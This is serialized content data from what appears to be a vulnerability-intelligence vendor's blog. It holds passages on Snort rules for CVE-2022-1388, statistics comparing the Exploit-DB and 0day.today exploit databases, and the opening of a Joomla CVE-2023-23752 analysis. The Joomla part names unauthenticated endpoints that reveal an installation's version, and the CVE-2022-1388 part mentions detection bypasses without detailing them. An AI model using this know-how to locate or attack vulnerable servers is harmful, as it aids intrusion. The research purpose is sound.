,"The problem is this: Snort Community Rule 59735 does an excellent job of catching a single minimum requirement for exploitation. At the end of the day, exploitation will always require a ",[886,103217,6331],{}," header that contains ",[886,103220,103221],{},"X-F5-Auth…",". It might not be the most performant rule (requires searching the entire HTTP header). It might be prone to false positives (particularly of other exploits). But after rooting around the F5 jar files for a possible normalization bypass, I’ll be damned if we can bypass this one. So hats off to you, Snort Community member! 
You’ve bested us this time!",[18,103224,103225,103226,103228,103229,103232,103233,103235],{},"But that’s not to say 59735 is the best Snort rule for this vulnerability, or even a good Snort rule at all. It isn’t great on performance, and it is worse on false-positive potential. For my money, the Emerging Threats signature is the best rule. If they update the rule to drop the ",[886,103227,9024],{}," logic, adjust the ",[886,103230,103231],{},"http_uri",", and fix the ",[886,103234,6331],{}," regular expression, then it will likely be the most performant and most accurate.",[61,103237,1903],{"id":1902},[18,103239,103240,103241,103243],{},"We explored open-source intelligence surrounding CVE-2022-1388. This vulnerability has been examined from every angle over the last year, but we thought we might be able to squeeze out one more interesting tidbit. In this blog, we detailed the exploit variants on GitHub, we found a few network signature bypasses, and we published a new exploit variant. All that was achievable ",[1131,103242,62400],{}," using open-source intelligence. Vulnerability analysis and vulnerability intelligence aren’t always done with a debugger. Sometimes it’s just picking up where others have left off, and iterating.",[18,103245,103246,103247,103250],{},"Do you like GitHub exploits too? 
To get access to our collection of GitHub exploits, register for a VulnCheck account today by loading ",[47,103248,78319],{"href":78319,"rel":103249},[51]," and clicking “Register”.",[2901,103252,103253],{},"",{"title":219,"searchDepth":220,"depth":220,"links":103255},[103256,103257,103258,103264,103265,103266,103267],{"id":100832,"depth":220,"text":100833},{"id":100955,"depth":220,"text":100956},{"id":101512,"depth":220,"text":101513,"children":103259},[103260,103261,103262,103263],{"id":101528,"depth":1266,"text":101529},{"id":101815,"depth":1266,"text":101816},{"id":101976,"depth":1266,"text":101977},{"id":102138,"depth":1266,"text":102139},{"id":102346,"depth":220,"text":102347},{"id":102765,"depth":220,"text":102766},{"id":103058,"depth":220,"text":103059},{"id":1902,"depth":220,"text":1903},"2023-04-13","In search of an interesting new detail about CVE-2022-1388, VulnCheck researchers pore over open source intelligence. 
The researchers detail exploit variants, find signature bypasses, and publish a novel exploit variant.",{"slug":103271},"new-cve-2022-1388","\u002Fblog\u002Fnew-cve-2022-1388",{"title":100731,"description":103269},"blog\u002Fnew-cve-2022-1388",[242],"_vd6HHQ1UOxYN333ZXyyt3qlttT7LbdbCd4rvpwOL9A",{"id":103278,"title":103279,"articles":7,"authors":103280,"body":103282,"date":103564,"description":103565,"extension":234,"image":7,"link":7,"meta":103566,"navigation":237,"path":103568,"seo":103569,"series":7,"stem":103570,"subtype":7,"tags":7,"__hash__":103571},"blog\u002Fblog\u002Fexploit-database-followup.md","A Follow-up to the Exploit-DB and 0day.today Comparison",[103281],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":103283,"toc":103559},[103284,103295,103301,103305,103314,103319,103326,103331,103335,103340,103344,103365,103383,103386,103389,103394,103398,103403,103406,103413,103422,103425,103430,103434,103438,103441,103443,103452,103461,103464,103469,103475,103480,103485,103488,103496,103499,103502,103510,103515,103519,103522,103530,103535,103538,103541,103543,103550,103553],[18,103285,103286,103287,103294],{},"After we published last week’s blog, ",[1131,103288,103289],{},[47,103290,103293],{"href":103291,"rel":103292},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fedb-0day-compare",[51],"A Comparison of Exploit-DB and 0day.today",", readers suggested additional data points they thought might be interesting. Those suggestions sparked a wave of ideas. Building on last week’s material, this blog looks deeper at the types of vulnerabilities in Exploit-DB and 0day.today and their use in the wild.",[18,103296,103297,103298,103300],{},"We mentioned this last week, but it bears repeating: 0day.today has a huge volume of exploits (~38,000), but only about 20% of those are associated with a CVE. Exploit-DB has even more exploits (~45,000), and they’ve associated CVE with more than half of those. 
That can make comparisons look a little skewed. Regardless, we think there’s a lot of value in discussing the exploits ",[1131,103299,297],{}," their associated CVE, so that is where this blog is focused.",[61,103302,103304],{"id":103303},"digging-into-the-exploits-cve","Digging into the Exploit’s CVE",[18,103306,103307,103308,103313],{},"The suggestion that really got the ball rolling was from ",[47,103309,103312],{"href":103310,"rel":103311},"https:\u002F\u002Fwww.reddit.com\u002Fr\u002Fnetsec\u002Fcomments\u002F127pexp\u002Fa_comparison_of_exploitdb_and_0daytoday\u002Fjege2mt\u002F",[51],"\u002Fu\u002FNo-Succotash4783"," on Reddit:",[1925,103315,103316],{},[18,103317,103318],{},"Nice job pulling that report. It would be nice to also show the top CWEs \u002F class of vulnerabilities for which exploits exist.",[18,103320,103321,103322,59],{},"We were able to quickly produce “Top 10 Database CVE CWE” graphs by cross-referencing the exploits against our ",[47,103323,1239],{"href":103324,"rel":103325},"https:\u002F\u002Fvulncheck.com\u002Fproduct\u002Fvulnerability-intelligence",[51],[1925,103327,103328],{},[18,103329,103330],{},"Exploit-DB CVE Top 10 CWE",[11128,103332],{":labels":103333,":values":103334},"[\"SQL Injection\",\"XSS\",\"Code Injection\",\"NVD-CWE-Other\",\"Path Traversal\",\"Generic Buffer Overflow\",\"Out-of-bounds Write\",\"Improper Input Validation\",\"Broken Access Control\",\"Information Leak\"]","[4601,3386,2107,1895,1891,1826,1411,971,764,670]",[1925,103336,103337],{},[18,103338,103339],{},"0day.today CVE Top 10 CWE",[11128,103341],{":labels":103342,":values":103343},"[\"XSS\",\"Generic Buffer Overflow\",\"SQL Injection\",\"NVD-CWE-noinfo\",\"Path Traversal\",\"Information Leak\",\"Improper Input Validation\",\"Command Injection\",\"CSRF\",\"Broken Access Control\"]","[921,588,540,410,365,316,309,284,258,227]",[18,103345,103346,103347,103352,103353,103358,103359,103364],{},"The high volume of 
",[47,103348,103351],{"href":103349,"rel":103350},"https:\u002F\u002Fcwe.mitre.org\u002Fdata\u002Fdefinitions\u002F79.html",[51],"cross-site scripting"," (XSS) exploits might suggest the databases don’t have the real-world application that attackers might hope for. While XSS is useful for bug bounties, it’s rarely associated with any real threat group. Proofpoint’s recent discovery of ",[47,103354,103357],{"href":103355,"rel":103356},"https:\u002F\u002Fwww.proofpoint.com\u002Fus\u002Fblog\u002Fthreat-insight\u002Fexploitation-dish-best-served-cold-winter-vivern-uses-known-zimbra-vulnerability",[51],"Winter Vivern"," using a Zimbra XSS (",[47,103360,103363],{"href":103361,"rel":103362},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-27926",[51],"CVE-2022-27926",") in the wild is the only such case we can recall in recent memory.",[18,103366,103367,103368,103373,103374,103379,103380,103382],{},"Otherwise, the databases have similar Top 10 CWE. The only real surprise is the absence of Command Injection (",[47,103369,103372],{"href":103370,"rel":103371},"https:\u002F\u002Fcwe.mitre.org\u002Fdata\u002Fdefinitions\u002F78.html",[51],"CWE-78",") from Exploit-DB’s top 10 and the absence of Code Injection (",[47,103375,103378],{"href":103376,"rel":103377},"https:\u002F\u002Fcwe.mitre.org\u002Fdata\u002Fdefinitions\u002F94.html",[51],"CWE-94",") from 0day.today’s. Last week, we discussed that 0day.today assigns more CVEs to ",[1131,103381,15523],{}," vulnerabilities than EDB has. Perhaps this shows that Code Injection is on the way down and, somehow, Command Injection is on the rise.",[18,103384,103385],{},"Of course, CWE doesn’t tell the full story. One of the weaknesses of CWE is that it doesn’t necessarily describe how a vulnerability is used. For instance, a generic buffer overflow might be used over the network (with or without credentials). It could be used locally during privilege escalation. 
Maybe it’s used during a user-interaction exploit (e.g., in a document-oriented attack). All three of those scenarios represent significantly different attacks.",[18,103387,103388],{},"VulnCheck attempts to address this shortcoming by automatically categorizing CVE according to their most likely attack scenario: initial-access, remote-with-credentials, infoleak, denial of service, local, client-side, and, of course, the dreaded “other”.",[1925,103390,103391],{},[18,103392,103393],{},"Exploit-DB Exploit CVE Categorization",[11128,103395],{":labels":103396,":values":103397},"[\"Client-side\",\"Denial-of-service\",\"Infoleak\",\"Initial-access\",\"Local\",\"Other\",\"Remote-with-credentials\"]","[6507,1685,1790,12293,523,235,1256]",[1925,103399,103400],{},[18,103401,103402],{},"0day.today Exploit CVE Categorization",[11128,103404],{":labels":103396,":values":103405},"[2292,283,472,1928,606,165,958]",[18,103407,103408,103409,59],{},"The most popular categorization in Exploit-DB is initial-access. These vulnerabilities allow remote and unauthenticated attackers to gain access to a victim network. They’re the type of vulnerabilities VulnCheck believes are ",[47,103410,103412],{"href":45535,"rel":103411},[51],"most important",[18,103414,103415,103416,103421],{},"The most popular categorization in 0day.today is client-side attacks. Client-side attacks are user-interaction-oriented attacks like XSS, CSRF, or document-based attacks. For example, ",[47,103417,103420],{"href":103418,"rel":103419},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-30190",[51],"Follina"," is a document-based attack that we categorize as “client-side”. They can be dangerous (Follina has been used widely), but they typically aren’t as dangerous as an initial-access vulnerability.",[18,103423,103424],{},"VulnCheck’s vulnerability categorization doesn’t necessarily capture the severity of a particular group. 
Initial-access is obviously bad, but we just discussed the wide range of vulnerabilities that are captured by client-side. Other categories, like remote-with-credentials and infoleak, have similar broad impact ranges. To better understand the overall impact in the databases, we mapped the exploit CVEs to their CVSS severity.",[1925,103426,103427],{},[18,103428,103429],{},"Exploit-DB Exploit CVE CVSS Severity",[11128,103431],{":labels":103432,":values":103433},"[\"Critical\",\"High\",\"Medium\",\"Low\",\"Unassigned\"]","[3641,9927,9973,602,146]",[1925,103435,103436],{},[18,103437,103429],{},[11128,103439],{":labels":103432,":values":103440},"[1599,2830,2133,68,74]",[61,103442,79305],{"id":25141},[18,103444,103445,103446,103451],{},"Of course, a freely available exploit doesn’t mean the vulnerability will be exploited in the wild. To predict which of these exploits might be used in the wild, we turn to the ",[47,103447,103450],{"href":103448,"rel":103449},"https:\u002F\u002Fwww.first.org\u002Fepss\u002F",[51],"Exploit Prediction Scoring System"," (EPSS). As its name suggests, the scoring system attempts to predict which vulnerabilities will be exploited in the wild.",[18,103453,103454,103455,103460],{},"When discussing EPSS, we find it easier to discuss the ",[47,103456,103459],{"href":103457,"rel":103458},"https:\u002F\u002Fwww.first.org\u002Fepss\u002Farticles\u002Fprob_percentile_bins",[51],"percentile rank"," instead of the raw probability. The scaling is easier to understand for our monkey brains. For example, two vulnerabilities are assigned an EPSS probability of 25% and 50%, respectively. Those sound like very different probabilities, but their percentile rank (ranked against all other vulnerabilities) is 95%+. 
Despite their gap in probability, they are both very bad vulnerabilities with a very high likelihood, compared to all the others, of being exploited in the wild.",[18,103462,103463],{},"We mapped the EPSS percentile rank for both databases, and due to the volume of data points, we had to break out Excel (so please excuse the lack of a fancy graphic).",[1925,103465,103466],{},[18,103467,103468],{},"Exploit-DB Exploit CVE EPSS Percentile",[18,103470,103471],{},[68,103472],{":width":10862,"alt":103473,"src":103474},"Exploit-DB EPSS Percentile Histogram","\u002Fblog\u002Fexploit-database-followup\u002Fedb-epss.png",[1925,103476,103477],{},[18,103478,103479],{},"0day.today Exploit CVE EPSS Percentile",[18,103481,103482],{},[68,103483],{":width":10862,"alt":103473,"src":103484},"\u002Fblog\u002Fexploit-database-followup\u002Fohdaytoday-epss.png",[18,103486,103487],{},"These graphs aren’t quite what we expected. There’s a long-running stigma in our industry that publishing an exploit inevitably leads to exploitation in the wild. That sort of makes logical sense. The presence of a vulnerability in an exploit database means at least two things:",[1789,103489,103490,103493],{},[25,103491,103492],{},"Someone has taken precious time out of their lives to figure out how to exploit a thing.",[25,103494,103495],{},"They shared that exploitation knowledge with the world.",[18,103497,103498],{},"A logical next step, that many have accepted as fact, is: “Bad actors use that freely shared knowledge against the innocent.”",[18,103500,103501],{},"Naively, we’d expect the probability of exploitation for any vulnerability in these databases to be nearly 100%. That isn’t what we are seeing here. While there are a disproportionate amount of 90%+ vulnerabilities, it’s interesting to see data points across the entire range, from 0% to 100%.",[18,103503,103504,103505,103509],{},"The reality is that the vast majority of these vulnerabilities aren’t used in the wild. 
VulnCheck ",[47,103506,103508],{"href":214,"rel":103507},[51],"tracks"," CVE exploited in the wild, and we found only a few hundred vulnerabilities in each database fit that bill.",[1925,103511,103512],{},[18,103513,103514],{},"CVE Exploited in the Wild (Tracked by VulnCheck)",[11128,103516],{":labels":103517,":values":103518},"[\"Exploit-DB\",\"0day.today\"]","[511,474]",[18,103520,103521],{},"Consider that Exploit-DB contains exploits for nearly 25,000 CVE, but only 500 of those have been exploited in the wild. 500 CVE is only 2% of the CVE in the database. What does that say about the other 98% of vulnerabilities of the database? What does it say about the actual harm associated with publishing an exploit?",[18,103523,103524,103525,103529],{},"Of course, you don’t have to exclusively trust our exploited in the wild data. The ",[47,103526,103528],{"href":2864,"rel":103527},[51],"CISA Known Exploited Vulnerabilities Catalog"," produces similar results.",[1925,103531,103532],{},[18,103533,103534],{},"CVE Exploited in the Wild (Tracked by CISA Kev Catalog)",[11128,103536],{":labels":103517,":values":103537},"[333,349]",[18,103539,103540],{},"With all the time and effort expended discovering these vulnerabilities, developing exploits, sharing the exploits, and curating these databases, it’s wild to think only a tiny percentage ever get used.",[61,103542,1903],{"id":1902},[18,103544,103545,103546,103549],{},"This blog took a deeper look into the types of vulnerabilities in Exploit-DB and 0day.today. The databases contain a wide range of exploits for attackers to enjoy. There are exploits for initial access, pivoting, and escalation. There are exploits for phishing and drive-by attacks. But each database also has a huge amount of low hanging (and possibly useless) exploits too. 
At the end of the day, only a select few exploits from these databases will ever be ",[295,103547,103548],{},"known"," to be exploited in the wild.",[18,103551,103552],{},"Thank you to those of you who reached out with questions!",[18,103554,103555,103556,103250],{},"Do you like exploits? So do we! VulnCheck maintains the largest collection of exploits. For more information, register for a VulnCheck account today by loading ",[47,103557,78319],{"href":78319,"rel":103558},[51],{"title":219,"searchDepth":220,"depth":220,"links":103560},[103561,103562,103563],{"id":103303,"depth":220,"text":103304},{"id":25141,"depth":220,"text":79305},{"id":1902,"depth":220,"text":1903},"2023-04-07","Following reader suggestions, we take a deeper look at the types of vulnerabilities in the Exploit-DB and 0day.today exploit databases. We also examine exploit attack vectors and find out how many of the exploits have been used in the wild.",{"slug":103567},"exploit-database-followup","\u002Fblog\u002Fexploit-database-followup",{"title":103279,"description":103565},"blog\u002Fexploit-database-followup","lcmUBV5P4jBiWilGhx78tSV1wghVsP5hRZ5ghl5Ipqk",{"id":103573,"title":103293,"articles":103574,"authors":103579,"body":103581,"date":103772,"description":103773,"extension":234,"image":7,"link":7,"meta":103774,"navigation":237,"path":103776,"seo":103777,"series":7,"stem":103778,"subtype":7,"tags":7,"__hash__":103779},"blog\u002Fblog\u002Fedb-0day-compare.md",[103575],{"title":103576,"source":3494,"link":103577,"date":103578},"Microsoft addresses OneNote malspam problem, promises fixes through the 
year","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-microsoft-addresses","2023-04-03",[103580],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":103582,"toc":103763},[103583,103585,103600,103604,103614,103619,103623,103638,103641,103647,103651,103658,103663,103667,103673,103677,103685,103690,103694,103697,103701,103704,103709,103713,103718,103722,103745,103747,103750,103755,103757,103760],[1920,103584,11648],{"id":11647},[18,103586,103587,103588,103593,103594,103599],{},"Reports of ",[47,103589,103592],{"href":103590,"rel":103591},"https:\u002F\u002Fwww.exploit-db.com\u002F",[51],"Exploit-DB’s"," death were greatly exaggerated. After publishing almost no exploits for four months, Exploit-DB is alive and publishing new exploits with a vengeance. As collectors of exploits, we missed Exploit-DB (EDB) and we’re glad it's back. But while EDB was on hiatus, we found that ",[47,103595,103598],{"href":103596,"rel":103597},"https:\u002F\u002F0day.today\u002F",[51],"0day.today"," was a reliable stand-in. Now with both projects alive and kicking, we wanted to get a better understanding of these exploit databases, and how they differ.",[61,103601,103603],{"id":103602},"number-of-exploits","Number of Exploits",[18,103605,103606,103607,103610,103611,103613],{},"Exploit-DB and 0day.today aren’t just exploit databases. Outside of exploits, they both have growing collections of shellcode, and EDB maintains large repositories of research papers and Google dorks. But the main draw is their exploits. By exploit volume, EDB is king. With more than 45,000 exploits",[47,103608,467],{"href":103609},"#footnotes",", EDB exceeds 0day.today’s offering of just under 38,000",[47,103612,353],{"href":103609},". On both fronts, that’s a lot of exploits. But how relevant are they? 
Both exploit repositories have timestamps on their exploits, so let’s graph those.",[1925,103615,103616],{},[18,103617,103618],{},"Total Exploits Per Year",[30063,103620],{":labels":103621,":series":103622},"[1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,2011,2012,2013,2014,2015,2016,2017,2018,2019,2020,2021,2022,2023]","[{\"type\":\"line\",\"name\":\"Exploit-DB\",\"color\":\"#6667ab\",\"data\":[2,0,2,1,1,1,7,7,35,97,92,374,630,535,790,1281,1406,2249,3474,3000,4044,3591,4757,2248,2175,1430,1199,1342,1535,2191,2266,1861,1399,1143,401,30]},{\"type\":\"line\",\"name\":\"0-day.today\",\"color\":\"#00c893\",\"data\":[0,0,0,0,0,0,0,0,7,14,2,0,54,49,13,135,318,584,1572,1731,2676,2852,4704,2050,2666,1470,1237,1651,1683,2657,2340,1768,1791,1543,943,154]}]",[18,103624,103625,103626,103631,103632,103637],{},"This graph says a few interesting things, but the first thing we’d like to call out is the “date” that is published by EDB. We believe this is generally reliable, but they also have a number of exploits published from ",[47,103627,103630],{"href":103628,"rel":103629},"https:\u002F\u002Fwww.exploit-db.com\u002Fexploits\u002F19039",[51],"1988"," through the 1990s, all of which ",[47,103633,103636],{"href":103634,"rel":103635},"https:\u002F\u002Fwww.exploit-db.com\u002Fhistory",[51],"predate EDB",". There may be a small amount of backdating going on (or something akin) but overall it didn’t appear to be an issue.",[18,103639,103640],{},"The peak of these two projects is wild. In 2010, they both added 4,700+ exploits. That’s almost 13 new exploits every day of the year. They have mightily fallen though. In 2022, 0day.today published 943 exploits, and EDB only managed 401. In fact, we were surprised to find that 0day.today has published more exploits per year than EDB since 2012 (with the exception of 2019). For whatever reason, we thought EDB was the standard and 0day.today the challenger. 
It might be the other way around.",[18,103642,103643,103644,103646],{},"There is a pretty obvious reason for the drop off in exploits. The rise of bug bounties (and associated platforms) ",[1131,103645,98490],{}," come to mind, but that's only a small drop in the bucket. We've found that the missing exploits are almost entirely found on social coding platforms like GitHub, GitLab, Gitee, Gist, etc. The huge shortfalls affecting these two databases are more or less correlated to the rise in popularity of these services. Social coding platforms were not wildly popular in 2010 (the 0day.today and EDB peak). Nowadays every coder has a GitHub account. Which means they don't need EDB or 0day.today anymore. They can avoid the hassle of submitting their work for third party editing and moderation, and simply upload the exploit\u002Fresearch to their own account.",[61,103648,103650],{"id":103649},"exploits-with-associated-cve","Exploits with Associated CVE",[18,103652,103653,103654,103657],{},"That isn't to say ",[1131,103655,103656],{},"we"," believe third party moderation is a bad thing. We know all too well that curating an exploit database is a real challenge now that exploits are scattered across social coding platforms. But it's a worthwhile endeavour. Both red and blue teams benefit from a curated database that includes CVE to exploit mappings. EDB outperforms 0day.today in this regard. They've been more likely, historically, to tag their exploits with an associated CVE identifier. 
The following graph shows the total exploits for each CVE year (CVE-YYYY):",[1925,103659,103660],{},[18,103661,103662],{},"Exploits By CVE Year (CVE-YYYY)",[30063,103664],{":labels":103665,":series":103666},"[1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,2011,2012,2013,2014,2015,2016,2017,2018,2019,2020,2021,2022,2023]","[{\"type\":\"line\",\"name\":\"Exploit-DB\",\"color\":\"#6667ab\",\"data\":[509,609,548,720,660,1113,1777,3357,3003,4055,2450,1630,762,1114,876,1085,819,635,1299,1225,816,350,275,113,0]},{\"type\":\"line\",\"name\":\"0-day.today\",\"color\":\"#00c893\",\"data\":[7,1,1,2,4,5,3,14,5,7,20,27,21,73,452,652,603,663,1340,1340,796,701,531,353,46]}]",[18,103668,103669,103670,103672],{},"During the massive peak in 2010, 0day.today attached very few CVE to their exploits even though they were publishing at the same rate as EDB. But since 2016, on a yearly basis, 0day.today has published ",[1131,103671,81313],{}," exploits associated with a CVE-ID than EDB. EDB might have 0day.today beat historically, but they trail 0day.today more recently.",[61,103674,103676],{"id":103675},"unique-exploits","Unique Exploits",[18,103678,103679,103680,103684],{},"For the exploits that have associated CVE, we can also determine the uniqueness of each database. For example, do both databases have exploits for ",[47,103681,97160],{"href":103682,"rel":103683},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-1270",[51]," or is that CVE unique to one database? The measurement of uniqueness is interesting, because one database can more or less eliminate the need for the other by dominating on the amount of unique exploits. 
The following bar graph shows the amount of overlap between the two databases.",[1925,103686,103687],{},[18,103688,103689],{},"Unique CVE",[11128,103691],{":labels":103692,":values":103693},"[\"Only in Exploit-DB\",\"In Both Databases\",\"Only in 0day.today\"]","[19577,4679,1979]",[18,103695,103696],{},"We can see Exploit-DB dominates from this point of view. 0day.today is hurt by its poor history of associating exploits to CVE, and is left with only 1,979 unique CVE in their database compared to EDB’s 19,577. While that would suggest that EDB is the better database, we also know that 0day.today is currently publishing more exploits per year. So it seems we can’t write off either database quite yet.",[61,103698,103700],{"id":103699},"exploit-authors","Exploit Authors",[18,103702,103703],{},"Both databases are largely composed of user submissions. With such large databases, we thought it would be interesting to see who the top 10 exploit authors were. We were somewhat surprised that the top four were identical for both projects. 
Although, given the amount of overlap between the databases, perhaps it shouldn’t have been a surprise.",[1925,103705,103706],{},[18,103707,103708],{},"Top 10 0day.today Authors",[11128,103710],{":labels":103711,":values":103712},"[\"Metasploit\",\"Google Security Research\",\"Ihsan Sencan\",\"LiquidWorm\",\"indoushka\",\"KedAns-Dz\",\"rgod\",\"High-Tech Bridge\",\"0day Today Team\",\"hyp3rlinx\"]","[1525,1018,901,668,453,265,255,243,234,234]",[1925,103714,103715],{},[18,103716,103717],{},"Top 10 Exploit-DB Authors",[11128,103719],{":labels":103720,":values":103721},"[\"Metasploit\",\"Google Security Research\",\"Ihsan Sencan\",\"LiquidWorm\",\"Luigi Auriemma\",\"High-Tech Bridge SA\",\"anonymous\",\"rgod\",\"Vulnerability-Lab\",\"indoushka\"]","[1928,1176,954,641,417,409,355,333,312,296]",[18,103723,103724,103725,1246,103729,1246,103734,1246,103739,103744],{},"It’s impressive to see the individual researchers that have produced so much content that they made it into these top 10 lists. ",[47,103726,103728],{"href":31494,"rel":103727},[51],"LiquidWorm",[47,103730,103733],{"href":103731,"rel":103732},"https:\u002F\u002Faluigi.altervista.org\u002F",[51],"Luigi Auriemma",[47,103735,103738],{"href":103736,"rel":103737},"http:\u002F\u002Fretrogod.altervista.org\u002F",[51],"rgod",[47,103740,103743],{"href":103741,"rel":103742},"http:\u002F\u002Fhyp3rlinx.altervista.org\u002F",[51],"hyp3rlinx",", etc. are well established in the profession so it isn’t a huge surprise that their exploits ended up in both databases, but the sheer volume is inspiring and says a lot about the impact the individual researcher can still have on the profession..",[61,103746,1903],{"id":1902},[18,103748,103749],{},"EDB and 0day.today both contain tens of thousands of exploits, and although there is a good amount of overlap between the projects, they each offer their own unique exploits. 
While many modern exploit developers may be moving to other venues (such as GitHub), these databases continue to be updated with new content and they contain historical exploits that have otherwise long fallen off the internet. Hopefully they continue to operate for many years to come.",[18,103751,103555,103752,103250],{},[47,103753,78319],{"href":68261,"rel":103754},[51],[993,103756,36665],{"id":36664},[18,103758,103759],{},"1 Data collected on March 25, 2023. EDB published dozens of exploits after this date, so any 2023-specific statistics might look wrong, but the reality is they were largely silent until late March.",[18,103761,103762],{},"2 You might be thinking, “Hey! The 0day.today website says they have more than 38,000 exploits!” That’s true, but we aren’t 100% sure how they arrived at that number. We believe they only exceed 38,000 if you include shellcode in the count. Which we don’t.",{"title":219,"searchDepth":220,"depth":220,"links":103764},[103765,103766,103767,103768,103769],{"id":103602,"depth":220,"text":103603},{"id":103649,"depth":220,"text":103650},{"id":103675,"depth":220,"text":103676},{"id":103699,"depth":220,"text":103700},{"id":1902,"depth":220,"text":1903,"children":103770},[103771],{"id":36664,"depth":1266,"text":36665},"2023-03-31","Exploit-DB and 0day.today are two of the largest public exploit databases. In this blog, we compare the databases to determine which one is the most relevant today.",{"slug":103775},"edb-0day-compare","\u002Fblog\u002Fedb-0day-compare",{"title":103293,"description":103773},"blog\u002Fedb-0day-compare","rwoMZzsvy9iXh4jxVjauYZFKWj7TeqlfFToel-Ayn6g",{"id":103781,"title":103782,"articles":103783,"authors":103788,"body":103790,"date":106075,"description":106076,"extension":234,"image":7,"link":7,"meta":106077,"navigation":237,"path":106079,"seo":106080,"series":7,"stem":106081,"subtype":7,"tags":106082,"__hash__":106083},"blog\u002Fblog\u002Fjoomla-for-rce.md","Joomla! 
CVE-2023-23752 to Code Execution",[103784],{"title":103785,"source":3494,"link":103786,"date":103787},"Risky Biz News: Team Synacktiv wins a Tesla and a cool half mil at Pwn2Own 2023","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-team-synacktiv-wins","2023-03-27",[103789],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":103791,"toc":106069},[103792,103811,103829,103833,103852,103863,103868,103872,103875,103880,103884,103887,103900,103904,103907,105082,105092,105102,105108,105117,105126,105594,105597,105618,105624,105634,105637,105641,105644,106040,106053,106055,106063,106066],[18,103793,103794,103795,30297,103799,103804,103805,103810],{},"On February 16, 2023, Joomla! published a ",[47,103796,20035],{"href":103797,"rel":103798},"https:\u002F\u002Fdeveloper.joomla.org\u002Fsecurity-centre\u002F894-20230201-core-improper-access-check-in-webservice-endpoints.html",[51],[47,103800,103803],{"href":103801,"rel":103802},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-23752",[51],"CVE-2023-23752",". The advisory describes an “improper access check” affecting Joomla! 4.0.0 through 4.2.7. The following day, a ",[47,103806,103809],{"href":103807,"rel":103808},"https:\u002F\u002Fxz.aliyun.com\u002Ft\u002F12175",[51],"chinese-language blog shared"," the technical details of the vulnerability. 
The blog describes an authentication bypass that allows an attacker to leak privileged information.",[18,103812,103813,103814,103819,103820,10515,103824,103828],{},"The blog’s disclosure was followed by a ",[47,103815,103818],{"href":103816,"rel":103817},"https:\u002F\u002Fgithub.com\u002Fsearch?q=CVE-2023-23752&type=repositories",[51],"stream of exploits"," hitting GitHub, and ",[47,103821,29823],{"href":103822,"rel":103823},"https:\u002F\u002Fisc.sans.edu\u002Fdiary\u002Frss\u002F29614",[51],[47,103825,24909],{"href":103826,"rel":103827},"https:\u002F\u002Fviz.greynoise.io\u002Ftag\u002Fjoomla-credential-disclosure-cve-2023-23752-attempt?days=30",[51]," of exploitation in the wild. The public exploits focus on leaking the victim’s MySQL database credentials – an unexciting prospect (we thought), because exposing the database to the internet is a dangerous misconfiguration. Nonetheless, attackers seemed interested in the vulnerability, so we sought to find out why.",[61,103830,103832],{"id":103831},"joomla-versions-in-the-wild","Joomla! Versions in the Wild",[18,103834,103835,103836,10515,103841,103846,103847,103851],{},"The importance of a vulnerability is often linked to the number of affected internet-facing systems. ",[47,103837,103840],{"href":103838,"rel":103839},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=http.component%3A%22Joomla%22",[51],"A",[47,103842,103845],{"href":103843,"rel":103844},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=html%3A%22Joomla%21+-+Open+Source+Content+Management%22",[51],"couple"," Shodan queries find approximately 50,000 internet-facing Joomla! Instances. ",[47,103848,55030],{"href":103849,"rel":103850},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=INCLUDE&q=services.http.response.body%3A%22Joomla%21+-+Open+Source+Content+Management%22",[51],", with virtual hosts included, puts that number closer to 1.3 million installations. 
We only have access to the Shodan data though, so we continue with that for the remainder of this writeup.",[18,103853,103854,103855,103858,103859,103862],{},"A Joomla! installation’s version can be remotely extracted without authentication by querying one of a few different endpoints. Joomla! version 4 exposes version information in the ",[886,103856,103857],{},"\u002Flanguage\u002Fen-GB\u002Flangmetadata.xml"," endpoint. Additionally, most, if not all, Joomla! Instances expose their version in the ",[886,103860,103861],{},"\u002Fadministrator\u002Fmanifests\u002Ffiles\u002Fjoomla.xml"," endpoint (retrievable without authentication, despite the pathname). We scanned the IP addresses indexed by Shodan and found that Joomla! 4 is not very popular. Only about 14% of responding Joomla! instances used version 4, the only version affected by CVE-2023-23752.",[1925,103864,103865],{},[18,103866,103867],{},"Joomla! Major Versions in the Wild",[11128,103869],{":labels":103870,":values":103871},"[1,2,3,4]","[205,2827,25061,4597]",[18,103873,103874],{},"Fewer than 5000 internet-facing installations is hard to get excited about. But what’s even worse for attackers, is that only ~1500 (or 4% of the responding Joomla! servers) remain vulnerable to the attack.",[1925,103876,103877],{},[18,103878,103879],{},"Joomla! 
